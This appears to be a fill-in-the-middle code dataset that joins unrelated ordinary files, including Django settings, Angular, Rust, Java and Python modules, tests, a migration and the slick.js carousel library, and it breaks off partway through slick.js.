<|file_name|>prod.py<|end_file_name|><|fim▁begin|>import os from .base import * # NOQA import dj_database_url DEBUG = False TEMPLATE_DEBUG = DEBUG ADMINS = ( ) DATABASES = {'default': dj_database_url.config()}<|fim▁hole|> LOGGING = { 'version': 1, 'disable_existing_loggers': True, 'filters': { 'require_debug_false': { '()': 'django.utils.log.RequireDebugFalse' } }, 'formatters': { 'verbose': { 'format': '%(levelname)s %(asctime)s %(module)s ' '%(process)d %(thread)d %(message)s' }, 'simple': { 'format': '%(levelname)s %(message)s' }, }, 'handlers': { 'null': { 'level': 'DEBUG', 'class': 'django.utils.log.NullHandler', }, 'console': { 'level': 'DEBUG', 'class': 'logging.StreamHandler', 'formatter': 'verbose' }, 'mail_admins': { 'level': 'ERROR', 'filters': ['require_debug_false'], 'class': 'django.utils.log.AdminEmailHandler' } }, 'loggers': { 'django': { 'handlers': ['console', 'mail_admins'], 'level': 'DEBUG', 'propagate': True, }, 'django.request': { 'handlers': ['console', 'mail_admins'], 'level': 'ERROR', 'propagate': False, }, 'django.db.backends': { 'handlers': ['console', 'mail_admins'], 'level': 'INFO', 'propagate': False, }, # Catch All Logger -- Captures any other logging '': { 'handlers': ['console', 'mail_admins'], 'level': 'DEBUG', 'propagate': True, } } } # Honor the 'X-Forwarded-Proto' header for request.is_secure() SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https') # Allow all host headers ALLOWED_HOSTS = ['*'] ########## EMAIL CONFIGURATION # See: https://docs.djangoproject.com/en/1.3/ref/settings/#email-backend EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend' # See: https://docs.djangoproject.com/en/1.3/ref/settings/#email-host EMAIL_HOST = os.environ.get('MAILGUN_SMTP_SERVER', None) # See: https://docs.djangoproject.com/en/1.3/ref/settings/#email-host-password EMAIL_HOST_PASSWORD = os.environ.get('MAILGUN_SMTP_PASSWORD', None) # See: https://docs.djangoproject.com/en/1.3/ref/settings/#email-host-user EMAIL_HOST_USER = os.environ.get('MAILGUN_SMTP_LOGIN', None) # See: https://docs.djangoproject.com/en/1.3/ref/settings/#email-port EMAIL_PORT = os.environ.get('MAILGUN_SMTP_PORT', None ) # See: https://docs.djangoproject.com/en/1.3/ref/settings/#email-subject-prefix EMAIL_SUBJECT_PREFIX = '[Scorinator] ' # See: https://docs.djangoproject.com/en/1.3/ref/settings/#email-use-tls EMAIL_USE_TLS = True # See: https://docs.djangoproject.com/en/1.3/ref/settings/#server-email SERVER_EMAIL = EMAIL_HOST_USER ########## END EMAIL CONFIGURATION<|fim▁end|>
<|file_name|>pgn.component.ts<|end_file_name|><|fim▁begin|>import { Component, Output, EventEmitter } from '@angular/core'; import { ChessService } from '../shared'; import { PgnLineComponent } from '../pgn-line'; @Component({ selector: 'app-pgn', templateUrl: 'pgn.component.html', styleUrls: ['pgn.component.scss'], directives: [PgnLineComponent] }) export class PgnComponent { @Output() updatePosition: EventEmitter<any> = new EventEmitter(); constructor(private chessService: ChessService) {} onUpdatePosition() { this.updatePosition.emit(null); } getMainline() {<|fim▁hole|> return this.chessService.chess.currentGame.boardVariations[0]; } getBasePosition() { return []; } }<|fim▁end|>
<|file_name|>tools_test.py<|end_file_name|><|fim▁begin|>from unidown.tools import unlink_dir_rec <|fim▁hole|> no_folder = tmp_path.joinpath("./donotexist/") assert not no_folder.exists() unlink_dir_rec(no_folder) assert not no_folder.exists() def test_recursive(self, tmp_path): for number in range(1, 4): with tmp_path.joinpath(str(number)).open('w'): pass sub_folder = tmp_path.joinpath("sub") sub_folder.mkdir(parents=True, exist_ok=True) for number in range(1, 4): with sub_folder.joinpath(str(number)).open('w'): pass tmp_path.joinpath("sub2").mkdir() unlink_dir_rec(tmp_path) assert not tmp_path.exists()<|fim▁end|>
class TestDeleteDirRec: def test_non_existence(self, tmp_path):
<|file_name|>htmllielement.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ use dom::bindings::codegen::HTMLLIElementBinding; use dom::bindings::utils::{DOMString, ErrorResult}; use dom::document::AbstractDocument; use dom::element::HTMLLIElementTypeId; use dom::htmlelement::HTMLElement; use dom::node::{AbstractNode, Node}; pub struct HTMLLIElement { htmlelement: HTMLElement, } impl HTMLLIElement { pub fn new_inherited(localName: ~str, document: AbstractDocument) -> HTMLLIElement { HTMLLIElement { htmlelement: HTMLElement::new_inherited(HTMLLIElementTypeId, localName, document) } } pub fn new(localName: ~str, document: AbstractDocument) -> AbstractNode { let element = HTMLLIElement::new_inherited(localName, document); Node::reflect_node(@mut element, document, HTMLLIElementBinding::Wrap) } } impl HTMLLIElement { pub fn Value(&self) -> i32 { 0 } pub fn SetValue(&mut self, _value: i32) -> ErrorResult {<|fim▁hole|> Ok(()) } pub fn Type(&self) -> DOMString { ~"" } pub fn SetType(&mut self, _type: DOMString) -> ErrorResult { Ok(()) } }<|fim▁end|>
<|file_name|>logic.py<|end_file_name|><|fim▁begin|># This file is part of Korman. # # Korman is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Korman is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Korman. If not, see <http://www.gnu.org/licenses/>. import bpy from bpy.props import * from PyHSPlasma import * from .base import PlasmaModifierProperties from ..prop_world import game_versions from ...exporter import ExportError from ... import idprops class PlasmaVersionedNodeTree(idprops.IDPropMixin, bpy.types.PropertyGroup): name = StringProperty(name="Name") version = EnumProperty(name="Version", description="Plasma versions this node tree exports under", items=game_versions, options={"ENUM_FLAG"}, default=set(list(zip(*game_versions))[0])) node_tree = PointerProperty(name="Node Tree", description="Node Tree to export", type=bpy.types.NodeTree) node_name = StringProperty(name="Node Ref", description="Attach a reference to this node") @classmethod def _idprop_mapping(cls): return {"node_tree": "node_tree_name"} def _idprop_sources(self): return {"node_tree_name": bpy.data.node_groups} class PlasmaAdvancedLogic(PlasmaModifierProperties): pl_id = "advanced_logic" bl_category = "Logic" bl_label = "Advanced" bl_description = "Plasma Logic Nodes" bl_icon = "NODETREE" logic_groups = CollectionProperty(type=PlasmaVersionedNodeTree) active_group_index = IntProperty(options={"HIDDEN"}) def export(self, exporter, bo, so): version = exporter.mgr.getVer() for i in self.logic_groups: our_versions = [globals()[j] for j in i.version] if version in our_versions: if i.node_tree is None: raise ExportError("'{}': Advanced Logic is missing a node tree for '{}'".format(bo.name, i.version)) # If node_name is defined, then we're only adding a reference. We will make sure that # the entire node tree is exported once before the post_export step, however. if i.node_name:<|fim▁hole|> # We are going to assume get_key will do the adding correctly. Single modifiers # should fetch the appropriate SceneObject before doing anything, so this will # be a no-op in that case. Multi modifiers should accept any SceneObject, however node.get_key(exporter, so) else: exporter.node_trees_exported.add(i.node_tree.name) i.node_tree.export(exporter, bo, so) def harvest_actors(self): actors = set() for i in self.logic_groups: actors.update(i.node_tree.harvest_actors()) return actors class PlasmaSpawnPoint(PlasmaModifierProperties): pl_id = "spawnpoint" bl_category = "Logic" bl_label = "Spawn Point" bl_description = "Point at which avatars link into the Age" def export(self, exporter, bo, so): # Not much to this modifier... It's basically a flag that tells the engine, "hey, this is a # place the avatar can show up." Nice to have a simple one to get started with. 
spawn = exporter.mgr.add_object(pl=plSpawnModifier, so=so, name=self.key_name) @property def requires_actor(self): return True class PlasmaMaintainersMarker(PlasmaModifierProperties): pl_id = "maintainersmarker" bl_category = "Logic" bl_label = "Maintainer's Marker" bl_description = "Designates an object as the D'ni coordinate origin point of the Age." bl_icon = "OUTLINER_DATA_EMPTY" calibration = EnumProperty(name="Calibration", description="State of repair for the Marker", items=[ ("kBroken", "Broken", "A marker which reports scrambled coordinates to the KI."), ("kRepaired", "Repaired", "A marker which reports blank coordinates to the KI."), ("kCalibrated", "Calibrated", "A marker which reports accurate coordinates to the KI.") ]) def export(self, exporter, bo, so): maintmark = exporter.mgr.add_object(pl=plMaintainersMarkerModifier, so=so, name=self.key_name) maintmark.calibration = getattr(plMaintainersMarkerModifier, self.calibration) @property def requires_actor(self): return True<|fim▁end|>
exporter.want_node_trees[i.node_tree.name] = (bo, so) node = i.node_tree.nodes.get(i.node_name, None) if node is None: raise ExportError("Node '{}' does not exist in '{}'".format(i.node_name, i.node_tree.name))
<|file_name|>rust_base64.rs<|end_file_name|><|fim▁begin|>use indy_api_types::errors::prelude::*; use failure::ResultExt; pub fn encode(doc: &[u8]) -> String { base64::encode(doc) } pub fn decode(doc: &str) -> Result<Vec<u8>, IndyError> { base64::decode(doc)<|fim▁hole|> .map_err(|err| err.into()) } pub fn encode_urlsafe(doc: &[u8]) -> String { base64::encode_config(doc, base64::URL_SAFE) //TODO switch to URL_SAFE_NO_PAD } pub fn decode_urlsafe(doc: &str) -> Result<Vec<u8>, IndyError> { base64::decode_config(doc, base64::URL_SAFE_NO_PAD) .context("Invalid base64URL_SAFE sequence") .context(IndyErrorKind::InvalidStructure) .map_err(|err| err.into()) } #[cfg(test)] mod tests { use super::*; #[test] fn encode_works() { let result = encode(&[1, 2, 3]); assert_eq!("AQID", &result); } #[test] fn decode_works() { let result = decode("AQID"); assert!(result.is_ok(), "Got error"); assert_eq!(&[1, 2, 3], &result.unwrap()[..]); } #[test] fn encode_urlsafe_works() { let result = encode_urlsafe(&[1, 2, 3]); assert_eq!("AQID", &result); } #[test] fn decode_urlsafe_works() { let result = decode_urlsafe("AQID"); assert!(result.is_ok(), "Got error"); assert_eq!(&[1, 2, 3], &result.unwrap()[..]); } #[test] // aries-396 fn encode_base64_urlsafe_and_urlsafe_no_pad_compatible() { let data = "Hello World"; { let encoded = base64::encode_config(data, base64::URL_SAFE); let decoded_data = base64::decode_config(&encoded, base64::URL_SAFE_NO_PAD).unwrap(); assert_eq!(data.as_bytes().to_vec(), decoded_data); } { let encoded = base64::encode_config(data, base64::URL_SAFE_NO_PAD); let decoded_data = base64::decode_config(&encoded, base64::URL_SAFE).unwrap(); assert_eq!(data.as_bytes().to_vec(), decoded_data); } } }<|fim▁end|>
.context("Invalid base64 sequence") .context(IndyErrorKind::InvalidStructure)
<|file_name|>CodeConverter.java<|end_file_name|><|fim▁begin|>package me.killje.servercaster.core.converter; import java.util.ArrayList; import java.util.Collection; import java.util.HashMap;<|fim▁hole|>import me.killje.servercaster.core.ServerCaster; import mkremins.fanciful.FancyMessage; import org.bukkit.entity.Player; /** * * @author Patrick Beuks (killje) and Floris Huizinga (Flexo013) */ public class CodeConverter extends Converter { private static final Map<String, CodeAction> codes = new HashMap<>(); private final ArrayList<CodeAction> actionCode = new ArrayList<>(); private final ArrayList<CodeAction> emptyCodes = new ArrayList<>(); private boolean nextChar = false; private boolean inBracket = false; private final Collection<? extends Player> players; CodeConverter(FancyMessage fm, Collection<? extends Player> players) { super(fm); for (Map.Entry<String, CodeAction> entry : codes.entrySet()) { CodeAction codeAction = entry.getValue(); codeAction.setBuilders(fm, players); } this.players = players; } @Override boolean isEndChar(char c) { return c == ';'; } @Override Converter end() { nextChar = true; String savedString = getSavedString(); if (codes.containsKey(savedString.toLowerCase())) { CodeAction ca = codes.get(savedString.toLowerCase()); if (ca.hasArgumentsLeft()) { actionCode.add(ca); } else { emptyCodes.add(ca); } } else { ServerCaster.getInstance().getLogger().logp( Level.WARNING, this.getClass().getName(), "end()", "Unknown Action Code", new IllegalArgumentException("Code Action Unknown (" + savedString + ")")); } clearSavedString(); return this; } @Override Converter nextChar(char c) { if (fm == null) { throw new NullPointerException("FancyMessage not declared"); } if (inBracket) { if (actionCode.get(0).isEndChar(c)) { if (actionCode.get(0).isEnd(getSavedString())) { actionCode.remove(0); inBracket = false; } } addChar(c); return this; } if (nextChar) { if (c == '{') { if (actionCode.isEmpty()) { return new BracketConverter(fm, emptyCodes, players); } inBracket = true; return this; } else { nextChar = false; return this; } } else { return super.nextChar(c); } } public static void addCodeAction(CodeAction ca) { codes.put(ca.getCode(), ca); } public static void removeCodeAction(CodeAction ca) { codes.remove(ca.getCode()); } }<|fim▁end|>
import java.util.Map; import java.util.logging.Level;
<|file_name|>4623531fa2b_record_information_about_how_a_game_.py<|end_file_name|><|fim▁begin|>"""Record information about how a game finished. Revision ID: 4623531fa2b Revises: 9aec2a74d9 Create Date: 2016-04-16 12:27:45.788322 """ # revision identifiers, used by Alembic. revision = '4623531fa2b' down_revision = '9aec2a74d9' from alembic import op import sqlalchemy as sa import app.go as go # A kind of hybrid table that contains both the old/downgraded column # 'finished' as well as the upgraded column 'result' gamehelper = sa.Table( 'games', sa.MetaData(), sa.Column('id', sa.Integer, primary_key=True), sa.Column('result', sa.Enum('WBR', 'WBC', 'BBR', 'BBC', 'D', '')), sa.Column('finished', sa.Boolean), sa.Column('sgf', sa.Text) ) def upgrade(): with op.batch_alter_table('games', schema=None) as batch_op:<|fim▁hole|> connection.execute( gamehelper.update().where( gamehelper.c.id == game.id ).values(result=result) ) with op.batch_alter_table('games', schema=None) as batch_op: batch_op.drop_column('finished') ### end Alembic commands ### def downgrade(): connection = op.get_bind() with op.batch_alter_table('games', schema=None) as batch_op: batch_op.add_column(sa.Column('finished', sa.BOOLEAN(), server_default=sa.text("'0'"), autoincrement=False, nullable=True)) for game in connection.execute(gamehelper.select()): finished = game.result != "" connection.execute( gamehelper.update().where( gamehelper.c.id == game.id ).values(finished=finished)) with op.batch_alter_table('games', schema=None) as batch_op: batch_op.drop_column('result') ### end Alembic commands ###<|fim▁end|>
batch_op.add_column(sa.Column('result', sa.Enum('WBR', 'WBC', 'BBR', 'BBC', 'D', ''), nullable=True)) connection = op.get_bind() for game in connection.execute(gamehelper.select()): result = go.get_game_result(game.sgf).value
<|file_name|>spatial_graphs.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python #-*- coding:utf-8 -*- # # This file is part of the NNGT project to generate and analyze # neuronal networks and their activity. # Copyright (C) 2015-2019 Tanguy Fardet # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. ''' Spatial graphs generation and methods ''' <|fim▁hole|>import numpy as np import nngt from nngt.geometry import Shape # nngt.seed(0) # ---------------------------- # # Generate the spatial network # # ---------------------------- # ell = Shape.ellipse(radii=(3000., 5000.)) num_nodes = 1000 population = nngt.NeuralPop.uniform(num_nodes) g = nngt.generation.gaussian_degree( 100., 5., nodes=num_nodes, shape=ell, population=population) # -------------- # # Saving/loading # # -------------- # start = time.time() g.to_file('sp_graph.el') print('Saving in {} s.'.format(time.time() - start)) start = time.time() g2 = nngt.Graph.from_file('sp_graph.el') print('Loading in {} s.'.format(time.time() - start)) # check equality of shapes and populations print('Both networks have same area: {}.'.format( np.isclose(g2.shape.area, ell.area))) print('They also have the same boundaries: {}.'.format( np.all(np.isclose(g2.shape.bounds, ell.bounds)))) same_groups = np.all( [g2.population[k] == g.population[k] for k in g.population]) same_ids = np.all( [g2.population[k].ids == g.population[k].ids for k in g.population]) print('They also have the same population: {}.'.format(same_groups * same_ids)) # remove file os.remove('sp_graph.el') # ---- # # Plot # # ---- # if nngt.get_config('with_plot'): nngt.plot.draw_network(g2, decimate_connections=100, show=True)<|fim▁end|>
import os import time
<|file_name|>test_attach.py<|end_file_name|><|fim▁begin|># encoding: utf-8 ''' Tests for various attachment thingies Created on Oct 21, 2013 @author: pupssman<|fim▁hole|>import pytest from hamcrest import has_entries, assert_that, is_, contains, has_property from allure.constants import AttachmentType from allure.utils import all_of @pytest.mark.parametrize('package', ['pytest.allure', 'allure']) def test_smoke(report_for, package): report = report_for(""" import pytest import allure def test_x(): %s.attach('Foo', 'Bar') """ % package) assert_that(report.findall('test-cases/test-case/attachments/attachment'), contains(has_property('attrib', has_entries(title='Foo')))) @pytest.mark.parametrize('a_type', map(lambda x: x[0], all_of(AttachmentType))) def test_attach_types(report_for, a_type): report = report_for(""" import allure as A def test_x(): A.attach('Foo', 'Bar', A.attach_type.%s) """ % a_type) assert_that(report.find('.//attachment').attrib, has_entries(title='Foo', type=getattr(AttachmentType, a_type).mime_type)) class TestContents: @pytest.fixture def attach_contents(self, report_for, reportdir): """ Fixture that returns contents of the attachment file for given attach body """ def impl(body): report = report_for(""" from pytest import allure as A def test_x(): A.attach('Foo', %s, A.attach_type.TEXT) """ % repr(body)) filename = report.find('.//attachment').get('source') return reportdir.join(filename).read('rb') return impl def test_ascii(self, attach_contents): assert_that(attach_contents('foo\nbar\tbaz'), is_(b'foo\nbar\tbaz')) def test_unicode(self, attach_contents): assert_that(attach_contents(u'ололо пыщьпыщь').decode('utf-8'), is_(u'ололо пыщьпыщь')) def test_broken_unicode(self, attach_contents): assert_that(attach_contents(u'ололо пыщьпыщь'.encode('cp1251')), is_(u'ололо пыщьпыщь'.encode('cp1251'))) def test_attach_in_fixture_teardown(report_for): """ Check that calling ``pytest.allure.attach`` in fixture teardown works and attaches it there. """ report = report_for(""" import pytest @pytest.yield_fixture(scope='function') def myfix(): yield pytest.allure.attach('Foo', 'Bar') def test_x(myfix): assert True """) assert_that(report.find('.//attachment').attrib, has_entries(title='Foo'))<|fim▁end|>
'''
<|file_name|>solution.py<|end_file_name|><|fim▁begin|>class Solution(object):
    def maxProfit(self, prices):
        """
        :type prices: List[int]
        :rtype: int
        """
        low = 1 << 31  # sentinel: larger than any price we will see
        profit = 0
        for p in prices:
            # track the lowest price seen so far
            if p < low:
                low = p
            # best profit if we buy at that low and sell at p
            if p - low > profit:
                profit = p - low<|fim▁hole|>
<|fim▁end|>
return profit
<|file_name|>slick.dev.js<|end_file_name|><|fim▁begin|>/* _ _ _ _ ___| (_) ___| | __ (_)___ / __| | |/ __| |/ / | / __| \__ \ | | (__| < _ | \__ \ |___/_|_|\___|_|\_(_)/ |___/ |__/ Version: 1.8.1 Author: Ken Wheeler Website: http://kenwheeler.github.io Docs: http://kenwheeler.github.io/slick Repo: http://github.com/kenwheeler/slick Issues: http://github.com/kenwheeler/slick/issues */ /* global window, document, define, jQuery, setInterval, clearInterval */ ;(function(factory) { 'use strict'; if (typeof define === 'function' && define.amd) { define(['jquery'], factory); } else if (typeof exports !== 'undefined') { module.exports = factory(require('jquery')); } else { factory(jQuery); } }(function($) { 'use strict'; var Slick = window.Slick || {}; Slick = (function() { var instanceUid = 0; function Slick(element, settings) { var _ = this, dataSettings; _.defaults = { accessibility: true, adaptiveHeight: false, appendArrows: $(element), appendDots: $(element), arrows: true, asNavFor: null, prevArrow: '<button class="slick-prev" aria-label="Previous" type="button">Previous</button>', nextArrow: '<button class="slick-next" aria-label="Next" type="button">Next</button>', autoplay: false, autoplaySpeed: 3000, centerMode: false, centerPadding: '50px', cssEase: 'ease', customPaging: function(slider, i) { return $('<button type="button" />').text(i + 1); }, dots: false, dotsClass: 'slick-dots', draggable: true, easing: 'linear', edgeFriction: 0.35, fade: false, focusOnSelect: false, focusOnChange: false, infinite: true, initialSlide: 0, lazyLoad: 'ondemand', mobileFirst: false, pauseOnHover: true, pauseOnFocus: true, pauseOnDotsHover: false, respondTo: 'window', responsive: null, rows: 1, rtl: false, slide: '', slidesPerRow: 1, slidesToShow: 1, slidesToScroll: 1, speed: 500, swipe: true, swipeToSlide: false, touchMove: true, touchThreshold: 5, useCSS: true, useTransform: true, variableWidth: false, vertical: false, verticalSwiping: false, waitForAnimate: true, zIndex: 1000 }; _.initials = { animating: false, dragging: false, autoPlayTimer: null, currentDirection: 0, currentLeft: null, currentSlide: 0, direction: 1, $dots: null, listWidth: null, listHeight: null, loadIndex: 0, $nextArrow: null, $prevArrow: null, scrolling: false, slideCount: null, slideWidth: null, $slideTrack: null, $slides: null, sliding: false, slideOffset: 0, swipeLeft: null, swiping: false, $list: null, touchObject: {}, transformsEnabled: false, unslicked: false }; $.extend(_, _.initials); _.activeBreakpoint = null; _.animType = null; _.animProp = null; _.breakpoints = []; _.breakpointSettings = []; _.cssTransitions = false; _.focussed = false; _.interrupted = false; _.hidden = 'hidden'; _.paused = true; _.positionProp = null; _.respondTo = null; _.rowCount = 1; _.shouldClick = true; _.$slider = $(element); _.$slidesCache = null; _.transformType = null; _.transitionType = null; _.visibilityChange = 'visibilitychange'; _.windowWidth = 0; _.windowTimer = null; dataSettings = $(element).data('slick') || {}; _.options = $.extend({}, _.defaults, settings, dataSettings); _.currentSlide = _.options.initialSlide; _.originalSettings = _.options; if (typeof document.mozHidden !== 'undefined') { _.hidden = 'mozHidden'; _.visibilityChange = 'mozvisibilitychange'; } else if (typeof document.webkitHidden !== 'undefined') { _.hidden = 'webkitHidden'; _.visibilityChange = 'webkitvisibilitychange'; } _.autoPlay = $.proxy(_.autoPlay, _); _.autoPlayClear = $.proxy(_.autoPlayClear, _); _.autoPlayIterator = $.proxy(_.autoPlayIterator, _); 
_.changeSlide = $.proxy(_.changeSlide, _); _.clickHandler = $.proxy(_.clickHandler, _); _.selectHandler = $.proxy(_.selectHandler, _); _.setPosition = $.proxy(_.setPosition, _); _.swipeHandler = $.proxy(_.swipeHandler, _); _.dragHandler = $.proxy(_.dragHandler, _); _.keyHandler = $.proxy(_.keyHandler, _); _.instanceUid = instanceUid++; // A simple way to check for HTML strings // Strict HTML recognition (must start with <) // Extracted from jQuery v1.11 source _.htmlExpr = /^(?:\s*(<[\w\W]+>)[^>]*)$/; _.registerBreakpoints(); _.init(true); } return Slick; }()); Slick.prototype.activateADA = function() { var _ = this; _.$slideTrack.find('.slick-active').attr({ 'aria-hidden': 'false' }).find('a, input, button, select').attr({ 'tabindex': '0' }); }; Slick.prototype.addSlide = Slick.prototype.slickAdd = function(markup, index, addBefore) { var _ = this; if (typeof(index) === 'boolean') { addBefore = index; index = null; } else if (index < 0 || (index >= _.slideCount)) { return false; } _.unload(); if (typeof(index) === 'number') { if (index === 0 && _.$slides.length === 0) { $(markup).appendTo(_.$slideTrack); } else if (addBefore) { $(markup).insertBefore(_.$slides.eq(index)); } else { $(markup).insertAfter(_.$slides.eq(index)); } } else { if (addBefore === true) { $(markup).prependTo(_.$slideTrack); } else { $(markup).appendTo(_.$slideTrack); } } _.$slides = _.$slideTrack.children(this.options.slide); _.$slideTrack.children(this.options.slide).detach(); _.$slideTrack.append(_.$slides); _.$slides.each(function(index, element) { $(element).attr('data-slick-index', index); }); _.$slidesCache = _.$slides; _.reinit(); }; Slick.prototype.animateHeight = function() { var _ = this; if (_.options.slidesToShow === 1 && _.options.adaptiveHeight === true && _.options.vertical === false) { var targetHeight = _.$slides.eq(_.currentSlide).outerHeight(true); _.$list.animate({ height: targetHeight }, _.options.speed); } }; Slick.prototype.animateSlide = function(targetLeft, callback) { var animProps = {}, _ = this; _.animateHeight(); if (_.options.rtl === true && _.options.vertical === false) { targetLeft = -targetLeft; } if (_.transformsEnabled === false) { if (_.options.vertical === false) { _.$slideTrack.animate({ left: targetLeft }, _.options.speed, _.options.easing, callback); } else { _.$slideTrack.animate({ top: targetLeft }, _.options.speed, _.options.easing, callback); } } else { if (_.cssTransitions === false) { if (_.options.rtl === true) { _.currentLeft = -(_.currentLeft); } $({ animStart: _.currentLeft }).animate({ animStart: targetLeft }, { duration: _.options.speed, easing: _.options.easing, step: function(now) { now = Math.ceil(now); if (_.options.vertical === false) { animProps[_.animType] = 'translate(' + now + 'px, 0px)'; _.$slideTrack.css(animProps); } else { animProps[_.animType] = 'translate(0px,' + now + 'px)'; _.$slideTrack.css(animProps); } }, complete: function() { if (callback) { callback.call(); } } }); } else { _.applyTransition(); targetLeft = Math.ceil(targetLeft); if (_.options.vertical === false) { animProps[_.animType] = 'translate3d(' + targetLeft + 'px, 0px, 0px)'; } else { animProps[_.animType] = 'translate3d(0px,' + targetLeft + 'px, 0px)'; } _.$slideTrack.css(animProps); if (callback) { setTimeout(function() { _.disableTransition(); callback.call(); }, _.options.speed); } } } }; Slick.prototype.getNavTarget = function() { var _ = this, asNavFor = _.options.asNavFor; if ( asNavFor && asNavFor !== null ) { asNavFor = $(asNavFor).not(_.$slider); } return asNavFor; }; 
Slick.prototype.asNavFor = function(index) { var _ = this, asNavFor = _.getNavTarget(); if ( asNavFor !== null && typeof asNavFor === 'object' ) { asNavFor.each(function() { var target = $(this).slick('getSlick'); if(!target.unslicked) { target.slideHandler(index, true); } }); } }; Slick.prototype.applyTransition = function(slide) { var _ = this, transition = {}; if (_.options.fade === false) { transition[_.transitionType] = _.transformType + ' ' + _.options.speed + 'ms ' + _.options.cssEase; } else { transition[_.transitionType] = 'opacity ' + _.options.speed + 'ms ' + _.options.cssEase; } if (_.options.fade === false) { _.$slideTrack.css(transition); } else { _.$slides.eq(slide).css(transition); } }; Slick.prototype.autoPlay = function() { var _ = this; _.autoPlayClear(); if ( _.slideCount > _.options.slidesToShow ) { _.autoPlayTimer = setInterval( _.autoPlayIterator, _.options.autoplaySpeed ); } }; Slick.prototype.autoPlayClear = function() { var _ = this; if (_.autoPlayTimer) { clearInterval(_.autoPlayTimer); } }; Slick.prototype.autoPlayIterator = function() { var _ = this, slideTo = _.currentSlide + _.options.slidesToScroll; if ( !_.paused && !_.interrupted && !_.focussed ) { if ( _.options.infinite === false ) { if ( _.direction === 1 && ( _.currentSlide + 1 ) === ( _.slideCount - 1 )) { _.direction = 0; } else if ( _.direction === 0 ) { slideTo = _.currentSlide - _.options.slidesToScroll; if ( _.currentSlide - 1 === 0 ) { _.direction = 1; } } } _.slideHandler( slideTo ); } }; Slick.prototype.buildArrows = function() { var _ = this; if (_.options.arrows === true ) { _.$prevArrow = $(_.options.prevArrow).addClass('slick-arrow'); _.$nextArrow = $(_.options.nextArrow).addClass('slick-arrow'); if( _.slideCount > _.options.slidesToShow ) { _.$prevArrow.removeClass('slick-hidden').removeAttr('aria-hidden tabindex'); _.$nextArrow.removeClass('slick-hidden').removeAttr('aria-hidden tabindex'); if (_.htmlExpr.test(_.options.prevArrow)) { _.$prevArrow.prependTo(_.options.appendArrows); } if (_.htmlExpr.test(_.options.nextArrow)) { _.$nextArrow.appendTo(_.options.appendArrows); } if (_.options.infinite !== true) { _.$prevArrow .addClass('slick-disabled') .attr('aria-disabled', 'true'); } } else { _.$prevArrow.add( _.$nextArrow ) .addClass('slick-hidden') .attr({ 'aria-disabled': 'true', 'tabindex': '-1' }); } } }; Slick.prototype.buildDots = function() { var _ = this, i, dot; if (_.options.dots === true && _.slideCount > _.options.slidesToShow) { _.$slider.addClass('slick-dotted'); dot = $('<ul />').addClass(_.options.dotsClass); for (i = 0; i <= _.getDotCount(); i += 1) { dot.append($('<li />').append(_.options.customPaging.call(this, _, i))); } _.$dots = dot.appendTo(_.options.appendDots); _.$dots.find('li').first().addClass('slick-active'); } }; Slick.prototype.buildOut = function() { var _ = this; _.$slides = _.$slider .children( _.options.slide + ':not(.slick-cloned)') .addClass('slick-slide'); _.slideCount = _.$slides.length; _.$slides.each(function(index, element) { $(element) .attr('data-slick-index', index) .data('originalStyling', $(element).attr('style') || ''); }); _.$slider.addClass('slick-slider'); _.$slideTrack = (_.slideCount === 0) ? 
$('<div class="slick-track"/>').appendTo(_.$slider) : _.$slides.wrapAll('<div class="slick-track"/>').parent(); _.$list = _.$slideTrack.wrap( '<div class="slick-list"/>').parent(); _.$slideTrack.css('opacity', 0); if (_.options.centerMode === true || _.options.swipeToSlide === true) { _.options.slidesToScroll = 1; } $('img[data-lazy]', _.$slider).not('[src]').addClass('slick-loading'); _.setupInfinite(); _.buildArrows(); _.buildDots(); _.updateDots(); _.setSlideClasses(typeof _.currentSlide === 'number' ? _.currentSlide : 0); if (_.options.draggable === true) { _.$list.addClass('draggable'); } }; Slick.prototype.buildRows = function() { var _ = this, a, b, c, newSlides, numOfSlides, originalSlides,slidesPerSection; newSlides = document.createDocumentFragment(); originalSlides = _.$slider.children(); if(_.options.rows > 0) { slidesPerSection = _.options.slidesPerRow * _.options.rows; numOfSlides = Math.ceil( originalSlides.length / slidesPerSection ); for(a = 0; a < numOfSlides; a++){ var slide = document.createElement('div'); for(b = 0; b < _.options.rows; b++) { var row = document.createElement('div'); for(c = 0; c < _.options.slidesPerRow; c++) { var target = (a * slidesPerSection + ((b * _.options.slidesPerRow) + c)); if (originalSlides.get(target)) { row.appendChild(originalSlides.get(target)); } } slide.appendChild(row); } newSlides.appendChild(slide); } _.$slider.empty().append(newSlides); _.$slider.children().children().children() .css({ 'width':(100 / _.options.slidesPerRow) + '%', 'display': 'inline-block' }); } }; Slick.prototype.checkResponsive = function(initial, forceUpdate) { var _ = this, breakpoint, targetBreakpoint, respondToWidth, triggerBreakpoint = false; var sliderWidth = _.$slider.width(); var windowWidth = window.innerWidth || $(window).width(); if (_.respondTo === 'window') { respondToWidth = windowWidth; } else if (_.respondTo === 'slider') { respondToWidth = sliderWidth; } else if (_.respondTo === 'min') { respondToWidth = Math.min(windowWidth, sliderWidth); } if ( _.options.responsive && _.options.responsive.length && _.options.responsive !== null) { targetBreakpoint = null; for (breakpoint in _.breakpoints) { if (_.breakpoints.hasOwnProperty(breakpoint)) { if (_.originalSettings.mobileFirst === false) { if (respondToWidth < _.breakpoints[breakpoint]) { targetBreakpoint = _.breakpoints[breakpoint]; } } else { if (respondToWidth > _.breakpoints[breakpoint]) { targetBreakpoint = _.breakpoints[breakpoint]; } } } } if (targetBreakpoint !== null) { if (_.activeBreakpoint !== null) { if (targetBreakpoint !== 